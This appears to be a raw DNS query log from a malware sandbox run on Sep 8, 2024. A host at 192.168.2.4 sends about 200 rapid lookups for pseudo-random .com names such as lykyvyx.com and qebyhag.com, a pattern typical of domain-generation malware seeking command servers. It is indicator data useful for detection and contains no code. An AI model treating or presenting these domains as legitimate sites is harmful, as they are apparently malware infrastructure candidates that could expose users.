                                                                                                                                                                                                            Sep 8, 2024 09:00:04.192704916 CEST192.168.2.41.1.1.10x79cdStandard query (0)lykyvyx.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:04.194417000 CEST192.168.2.41.1.1.10x2ab7Standard query (0)vofypam.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:04.195748091 CEST192.168.2.41.1.1.10xd136Standard query (0)vopyrik.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:04.196475983 CEST192.168.2.41.1.1.10x9f05Standard query (0)qebyhag.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:04.196700096 CEST192.168.2.41.1.1.10x775bStandard query (0)pujycyp.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:04.197118998 CEST192.168.2.41.1.1.10xd475Standard query (0)gatyruw.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:04.197315931 CEST192.168.2.41.1.1.10xfb26Standard query (0)qeqykyv.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:04.197954893 CEST192.168.2.41.1.1.10xd71eStandard query (0)puvygog.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:04.198611975 CEST192.168.2.41.1.1.10x5cd5Standard query (0)lyrywur.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:04.199212074 CEST192.168.2.41.1.1.10xc98eStandard query (0)puzybil.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:04.199759960 CEST192.168.2.41.1.1.10xe731Standard query (0)lyxynir.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:04.199930906 CEST192.168.2.41.1.1.10xdad2Standard query (0)gahyces.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:04.200346947 CEST192.168.2.41.1.1.10xe325Standard query (0)vonyjef.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:04.200532913 CEST192.168.2.41.1.1.10x19cStandard query (0)lysytoj.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:04.200876951 CEST192.168.2.41.1.1.10x3cf3Standard query (0)galyvuz.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:04.201503038 CEST192.168.2.41.1.1.10x9d60Standard query (0)qegyxav.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:04.201961994 CEST192.168.2.41.1.1.10xcf84Standard query (0)qedytoq.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:04.202224970 CEST192.168.2.41.1.1.10x373eStandard query (0)qetykyq.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:04.202815056 CEST192.168.2.41.1.1.10xb85dStandard query (0)vojycec.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:04.202907085 CEST192.168.2.41.1.1.10x2c27Standard query (0)lyvygon.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:04.203278065 CEST192.168.2.41.1.1.10xf5a2Standard query (0)qetyrul.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:04.203411102 CEST192.168.2.41.1.1.10x3d42Standard query (0)lymyjyd.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:04.204205036 CEST192.168.2.41.1.1.10xedafStandard query (0)qekyvup.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:04.204790115 CEST192.168.2.41.1.1.10x4973Standard query (0)gadypah.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:04.205126047 CEST192.168.2.41.1.1.10xef85Standard query (0)puryjeq.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:04.207811117 CEST192.168.2.41.1.1.10x1474Standard query (0)qegytop.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:04.237087965 CEST192.168.2.41.1.1.10xbaa8Standard query (0)lyryjej.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:04.237296104 CEST192.168.2.41.1.1.10xb8d5Standard query (0)vocybuf.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:04.237484932 CEST192.168.2.41.1.1.10xacecStandard query (0)gahypoz.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:04.305941105 CEST192.168.2.41.1.1.10x11feStandard query (0)vojypat.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:04.305942059 CEST192.168.2.41.1.1.10x270cStandard query (0)qebyniv.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:04.306269884 CEST192.168.2.41.1.1.10x869cStandard query (0)vonymoc.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:04.309355974 CEST192.168.2.41.1.1.10xe8f5Standard query (0)qekysel.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:04.314605951 CEST192.168.2.41.1.1.10x397aStandard query (0)purywyl.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:04.318290949 CEST192.168.2.41.1.1.10x5ed3Standard query (0)gacyfih.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:04.318597078 CEST192.168.2.41.1.1.10x109eStandard query (0)vocygim.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:04.375783920 CEST192.168.2.41.1.1.10x38aaStandard query (0)ganynos.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:04.379061937 CEST192.168.2.41.1.1.10xb781Standard query (0)galydyw.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:04.379272938 CEST192.168.2.41.1.1.10x451dStandard query (0)lysylun.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:04.379446030 CEST192.168.2.41.1.1.10xa3b4Standard query (0)lyvynid.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:04.379599094 CEST192.168.2.41.1.1.10xb209Standard query (0)puvybuv.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:04.390290976 CEST192.168.2.41.1.1.10xb231Standard query (0)pujypal.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:04.390683889 CEST192.168.2.41.1.1.10x8054Standard query (0)gatykyh.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:04.400949001 CEST192.168.2.41.1.1.10x3f2Standard query (0)pupylug.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:04.401155949 CEST192.168.2.41.1.1.10xf575Standard query (0)vopykum.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:04.402679920 CEST192.168.2.41.1.1.10xd429Standard query (0)lykyser.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:04.405971050 CEST192.168.2.41.1.1.10x89b3Standard query (0)qedylig.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:04.406171083 CEST192.168.2.41.1.1.10xc759Standard query (0)lymymax.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:04.406510115 CEST192.168.2.41.1.1.10x372dStandard query (0)volydyk.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:04.409847975 CEST192.168.2.41.1.1.10xacffStandard query (0)gadyzib.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:04.410068035 CEST192.168.2.41.1.1.10xb784Standard query (0)puzyduq.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:04.410422087 CEST192.168.2.41.1.1.10xc3ddStandard query (0)qeqyqep.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:04.410595894 CEST192.168.2.41.1.1.10x766eStandard query (0)pumyjev.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:04.410768032 CEST192.168.2.41.1.1.10xfcf5Standard query (0)vofyzof.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:04.410918951 CEST192.168.2.41.1.1.10xbba1Standard query (0)lyxyfuj.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:04.411075115 CEST192.168.2.41.1.1.10xb1d3Standard query (0)pufyxov.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:04.411216974 CEST192.168.2.41.1.1.10x47d5Standard query (0)qexyfuq.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:04.411362886 CEST192.168.2.41.1.1.10x8161Standard query (0)gaqyqez.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:04.412552118 CEST192.168.2.41.1.1.10xf4c8Standard query (0)vowyqyt.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:04.485594034 CEST192.168.2.41.1.1.10x98aaStandard query (0)pumymap.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:04.488648891 CEST192.168.2.41.1.1.10xf142Standard query (0)lygyxad.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:05.691389084 CEST192.168.2.41.1.1.10xc825Standard query (0)gacyvub.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:05.695019007 CEST192.168.2.41.1.1.10x60c4Standard query (0)lygytix.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:05.696173906 CEST192.168.2.41.1.1.10x67d8Standard query (0)vofyruc.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:05.697750092 CEST192.168.2.41.1.1.10xf86fStandard query (0)qeqyhol.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:05.701677084 CEST192.168.2.41.1.1.10xd547Standard query (0)qexyvyg.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:05.703326941 CEST192.168.2.41.1.1.10x2b20Standard query (0)pufytip.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:05.703948975 CEST192.168.2.41.1.1.10xa254Standard query (0)gaqyhaw.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:05.704687119 CEST192.168.2.41.1.1.10x993dStandard query (0)lyxyvyn.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:05.705410004 CEST192.168.2.41.1.1.10x5c8fStandard query (0)puzyceg.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:05.705952883 CEST192.168.2.41.1.1.10x8d21Standard query (0)pupywyv.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:05.706546068 CEST192.168.2.41.1.1.10x5f63Standard query (0)qetyhov.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:05.707727909 CEST192.168.2.41.1.1.10x7601Standard query (0)vojyrum.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:05.709768057 CEST192.168.2.41.1.1.10xbbafStandard query (0)lyvyver.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:05.711961985 CEST192.168.2.41.1.1.10x927Standard query (0)pujytug.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:05.714731932 CEST192.168.2.41.1.1.10x74bfStandard query (0)gatyhos.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:05.715356112 CEST192.168.2.41.1.1.10xe758Standard query (0)vopyjac.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:05.716278076 CEST192.168.2.41.1.1.10xc50eStandard query (0)qebyvyl.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:05.717758894 CEST192.168.2.41.1.1.10xb792Standard query (0)lykytin.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:05.719320059 CEST192.168.2.41.1.1.10xf53fStandard query (0)ganyvyw.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:05.720448017 CEST192.168.2.41.1.1.10xcaa6Standard query (0)pupyjap.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:05.722062111 CEST192.168.2.41.1.1.10xab12Standard query (0)qekytig.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:05.723752022 CEST192.168.2.41.1.1.10xe9daStandard query (0)vonybuk.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:05.725835085 CEST192.168.2.41.1.1.10xa6c7Standard query (0)lysyjex.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:05.727046013 CEST192.168.2.41.1.1.10x60bdStandard query (0)galypob.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:05.729923010 CEST192.168.2.41.1.1.10xaa64Standard query (0)pumybuq.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:05.730540991 CEST192.168.2.41.1.1.10x86d9Standard query (0)qedykep.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:05.732429028 CEST192.168.2.41.1.1.10xba82Standard query (0)volypof.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:05.733490944 CEST192.168.2.41.1.1.10x8fc3Standard query (0)lymynuj.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:05.735172987 CEST192.168.2.41.1.1.10x3055Standard query (0)gadykyz.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:05.736828089 CEST192.168.2.41.1.1.10xbcd4Standard query (0)puzypav.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:05.738667011 CEST192.168.2.41.1.1.10x6dc0Standard query (0)qeqyniq.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:05.740394115 CEST192.168.2.41.1.1.10xf01fStandard query (0)gaqynih.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:05.742360115 CEST192.168.2.41.1.1.10x98cdStandard query (0)vofykyt.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:05.743976116 CEST192.168.2.41.1.1.10xd2f2Standard query (0)lyxysad.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:05.745595932 CEST192.168.2.41.1.1.10x3e71Standard query (0)pufylul.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:05.747392893 CEST192.168.2.41.1.1.10x9024Standard query (0)qexysev.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:05.748961926 CEST192.168.2.41.1.1.10xc19fStandard query (0)vowymom.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:05.750879049 CEST192.168.2.41.1.1.10x8952Standard query (0)lygylur.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:05.752198935 CEST192.168.2.41.1.1.10x6b44Standard query (0)purymog.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:05.753921032 CEST192.168.2.41.1.1.10xa201Standard query (0)gacydes.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:05.754513979 CEST192.168.2.41.1.1.10x60daStandard query (0)qegylul.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:05.757196903 CEST192.168.2.41.1.1.10xa2eStandard query (0)vocydyc.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:05.759042978 CEST192.168.2.41.1.1.10x30fStandard query (0)lyryman.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:05.760776043 CEST192.168.2.41.1.1.10x578eStandard query (0)gahyziw.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:05.761614084 CEST192.168.2.41.1.1.10x3524Standard query (0)puvydyp.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:05.763737917 CEST192.168.2.41.1.1.10x31d1Standard query (0)qetyqag.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:05.765528917 CEST192.168.2.41.1.1.10x8d4dStandard query (0)vojyzik.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:05.767229080 CEST192.168.2.41.1.1.10x9d2fStandard query (0)lyvyfux.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:05.768727064 CEST192.168.2.41.1.1.10x350aStandard query (0)gatyqeb.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:05.771513939 CEST192.168.2.41.1.1.10x4461Standard query (0)pujyxoq.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:05.773401022 CEST192.168.2.41.1.1.10x9068Standard query (0)qebyfup.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:05.774806023 CEST192.168.2.41.1.1.10x1eb9Standard query (0)vopyqef.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:05.776549101 CEST192.168.2.41.1.1.10x2653Standard query (0)lykyxoj.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:05.777193069 CEST192.168.2.41.1.1.10x6074Standard query (0)ganyfuz.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:05.778660059 CEST192.168.2.41.1.1.10x80f7Standard query (0)vowyjak.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:05.780349970 CEST192.168.2.41.1.1.10x7beStandard query (0)qekyxaq.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:05.781853914 CEST192.168.2.41.1.1.10xeda3Standard query (0)vonygit.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:05.783545017 CEST192.168.2.41.1.1.10x9c48Standard query (0)lysywyd.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:05.785105944 CEST192.168.2.41.1.1.10x54bcStandard query (0)galycah.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:05.787352085 CEST192.168.2.41.1.1.10x2863Standard query (0)pumygil.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:05.788901091 CEST192.168.2.41.1.1.10x53a6Standard query (0)lymygor.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:05.789273024 CEST192.168.2.41.1.1.10x320bStandard query (0)qedyruv.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:05.792933941 CEST192.168.2.41.1.1.10x54e8Standard query (0)volycem.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:05.793564081 CEST192.168.2.41.1.1.10xbe77Standard query (0)gadyrus.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:06.530358076 CEST192.168.2.41.1.1.10xb13eStandard query (0)vowyguf.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:06.530572891 CEST192.168.2.41.1.1.10x2033Standard query (0)lygywyj.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:06.534517050 CEST192.168.2.41.1.1.10x4349Standard query (0)puvycel.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:06.538332939 CEST192.168.2.41.1.1.10x9f96Standard query (0)purygiv.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:06.540702105 CEST192.168.2.41.1.1.10x7b77Standard query (0)qekyluv.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:06.564848900 CEST192.168.2.41.1.1.10xcbd2Standard query (0)ganydeh.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:06.565038919 CEST192.168.2.41.1.1.10xdd83Standard query (0)pujylyv.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:06.565490007 CEST192.168.2.41.1.1.10xb4eeStandard query (0)qexyxop.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:06.594434977 CEST192.168.2.41.1.1.10x86aaStandard query (0)pufyweq.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:06.594669104 CEST192.168.2.41.1.1.10x5f1eStandard query (0)qeqyfug.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:06.594954967 CEST192.168.2.41.1.1.10xe101Standard query (0)lyrygid.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:06.595366955 CEST192.168.2.41.1.1.10x16efStandard query (0)qedyqal.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:06.608897924 CEST192.168.2.41.1.1.10x6759Standard query (0)vopymit.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:06.615289927 CEST192.168.2.41.1.1.10xf497Standard query (0)gaqyfub.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:06.638047934 CEST192.168.2.41.1.1.10xec2cStandard query (0)vofyjom.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:06.638452053 CEST192.168.2.41.1.1.10x5fc8Standard query (0)lyxytur.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:06.639389992 CEST192.168.2.41.1.1.10xdffbStandard query (0)qeqyvev.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:06.639733076 CEST192.168.2.41.1.1.10x5b11Standard query (0)gaqyvys.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:06.639925003 CEST192.168.2.41.1.1.10x8b52Standard query (0)lygyjan.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:06.640091896 CEST192.168.2.41.1.1.10xba12Standard query (0)gacypiw.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:06.640710115 CEST192.168.2.41.1.1.10x5efaStandard query (0)pufyjag.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:06.640847921 CEST192.168.2.41.1.1.10xb7e1Standard query (0)purybup.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:06.641074896 CEST192.168.2.41.1.1.10xac8cStandard query (0)lyrynux.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:06.641258955 CEST192.168.2.41.1.1.10xfcc3Standard query (0)vowybyc.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:06.641426086 CEST192.168.2.41.1.1.10xaa0aStandard query (0)lyvysaj.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:06.641582012 CEST192.168.2.41.1.1.10x5970Standard query (0)lykylud.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:06.654295921 CEST192.168.2.41.1.1.10x1e8eStandard query (0)gahykeb.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:06.654480934 CEST192.168.2.41.1.1.10x8b0aStandard query (0)pupymol.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:06.654802084 CEST192.168.2.41.1.1.10x7f9aStandard query (0)lysymor.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:06.654844046 CEST192.168.2.41.1.1.10xd216Standard query (0)volyrut.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:06.655095100 CEST192.168.2.41.1.1.10xc8abStandard query (0)gadyhoh.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:06.666110992 CEST192.168.2.41.1.1.10xd91fStandard query (0)qebysaq.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:06.668776035 CEST192.168.2.41.1.1.10x8057Standard query (0)gahyruh.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:06.668976068 CEST192.168.2.41.1.1.10x97f9Standard query (0)vocypok.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:06.669051886 CEST192.168.2.41.1.1.10x532cStandard query (0)pumydyg.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:06.669240952 CEST192.168.2.41.1.1.10x3f65Standard query (0)lykywex.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:06.669399023 CEST192.168.2.41.1.1.10x87ccStandard query (0)qegykeg.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:06.669712067 CEST192.168.2.41.1.1.10x35bfStandard query (0)puvypoq.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:06.669902086 CEST192.168.2.41.1.1.10x3e09Standard query (0)vojykyf.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:06.670048952 CEST192.168.2.41.1.1.10xa32eStandard query (0)qegyryq.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:06.670279980 CEST192.168.2.41.1.1.10x1463Standard query (0)qedyhiq.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:06.696738958 CEST192.168.2.41.1.1.10x7173Standard query (0)qexytil.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:06.696945906 CEST192.168.2.41.1.1.10x40e6Standard query (0)ganycob.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:06.696990967 CEST192.168.2.41.1.1.10xd2cbStandard query (0)pupyguq.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:06.697166920 CEST192.168.2.41.1.1.10xb39Standard query (0)galyryz.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:06.697355986 CEST192.168.2.41.1.1.10x4c29Standard query (0)gatyniz.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:06.697391987 CEST192.168.2.41.1.1.10x21ebStandard query (0)vonycaf.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:06.697592020 CEST192.168.2.41.1.1.10x7992Standard query (0)qetynup.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:06.697738886 CEST192.168.2.41.1.1.10x60f6Standard query (0)lymyved.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:06.697933912 CEST192.168.2.41.1.1.10xf772Standard query (0)galyzus.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:06.697933912 CEST192.168.2.41.1.1.10x51c7Standard query (0)lysygij.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:06.698167086 CEST192.168.2.41.1.1.10xc6cStandard query (0)vonydem.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:06.698266983 CEST192.168.2.41.1.1.10x97f7Standard query (0)gacycaz.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:06.698422909 CEST192.168.2.41.1.1.10x4852Standard query (0)volyzic.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:06.698482037 CEST192.168.2.41.1.1.10x1d4aStandard query (0)lymyfyn.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:06.698663950 CEST192.168.2.41.1.1.10x2f4Standard query (0)gadyqaw.comA (IP address)IN (0x0001)false
